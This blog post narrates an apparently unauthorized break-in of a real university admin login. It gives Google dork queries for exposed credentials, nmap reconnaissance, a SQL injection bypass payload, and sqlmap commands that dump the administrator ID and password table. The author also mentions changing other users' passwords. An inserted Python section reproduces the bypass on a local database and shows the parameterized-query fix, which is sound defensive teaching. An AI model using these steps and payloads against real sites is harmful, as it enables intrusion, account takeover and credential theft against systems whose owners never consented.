How did I hack a website

Storage Architecture 2017-02-21

This article records the journey of how I hacked a website.

DON’T DO ANYTHING BAD!

1. Gathering more and more information

Google is a very useful tool; making good use of Google hacking may yield twice the result with half the effort. Some significant search operators are as follows:

site:xxxx.com
filetype:txt intext:username and password
site:baidu.com -site:www.baidu.com -site:video.baidu.com  // - : exclude
site:xxx.net intext:login
site:a2.xxxx.com inurl:file
site:a2.xxxx.com filetype:asp
site:a2.xxxx.com filetype:php
site:a2.xxxx.com filetype:aspx
site:a3.xxxx.com filetype:asp
site:xxxx.com intitle:管理  // 管理 = "admin" / "management"

I found a target by using:

site:xxx.edu.cn inurl:login

It was an admin login page. Next we need to find the website's IP address, usually in one of these two ways:

  • ping
  • whois

Next, use nmap to find more information about this website:

Only port 80 was open. In general, more open ports mean more potential security vulnerabilities. For this website, we can only attack its HTTP server.

2. Preliminary test

Entering admin' in the input box returned this page:

This means the website has a SQL injection vulnerability.

Then use Burp Suite to run some basic tests:

I found an interesting result: the payload ' or 1=1 or ''=' returned a response of a different length, so I tested this payload:

Wow, a successful login! We can modify other users' passwords:
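To show why the probe in step 2 behaves this way, here is an added example that is not code from the original post: a constructed SQLite login check written with string concatenation, the write-up's single-quote probe and ' or 1=1 or ''=' payload run against it, and the parameterized version that treats the same input as plain data. The table and column names follow the write-up (adminid, id, passwd); the stored password value is made up.

```python
import sqlite3

PAYLOAD = "' or 1=1 or ''='"  # the payload from the write-up above


def make_db():
    # Constructed sample database with one admin row (not the target's data).
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE adminid (id TEXT, passwd TEXT)")
    db.execute("INSERT INTO adminid VALUES ('admin', 'correct-horse')")
    return db


def login_vulnerable(db, user, pw):
    # Concatenation: user input becomes part of the SQL grammar.
    sql = f"SELECT id FROM adminid WHERE id='{user}' AND passwd='{pw}'"
    return db.execute(sql).fetchone() is not None


def login_fixed(db, user, pw):
    # Placeholders: the driver passes input as data, never as SQL tokens.
    sql = "SELECT id FROM adminid WHERE id=? AND passwd=?"
    return db.execute(sql, (user, pw)).fetchone() is not None


def quote_probe_errors(db, user):
    # Step 2 of the write-up: a lone quote breaks the concatenated query,
    # which is the error page the author saw after entering admin'.
    try:
        login_vulnerable(db, user, "x")
        return False
    except sqlite3.OperationalError:
        return True


def demo():
    # With concatenation the WHERE clause becomes
    #   id='admin' AND passwd='' or 1=1 or ''=''  -> always true.
    # With placeholders the payload is compared literally and fails.
    db = make_db()
    return {
        "quote_probe_errors": quote_probe_errors(db, "admin'"),
        "vulnerable_bypassed": login_vulnerable(db, "admin", PAYLOAD),
        "fixed_bypassed": login_fixed(db, "admin", PAYLOAD),
        "fixed_valid_login": login_fixed(db, "admin", "correct-horse"),
    }


if __name__ == "__main__":
    print(demo())
```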

But that is not the end.

3. Further penetration testing

Save the POST request to post.txt through Burp's proxy, and call sqlmap:

sqlmap -r post.txt -p id --risk=3 --dbs

Boom, found its table name: adminid. Continue:

sqlmap -r post.txt -p id --columns -T adminid

Finally:

sqlmap -r post.txt -p id --dump -T adminid -C "id,passwd"

Haha, the admin's ID and password were out.

It's just for fun, please don't do anything bad!

Content edited by: IT Dreamer.
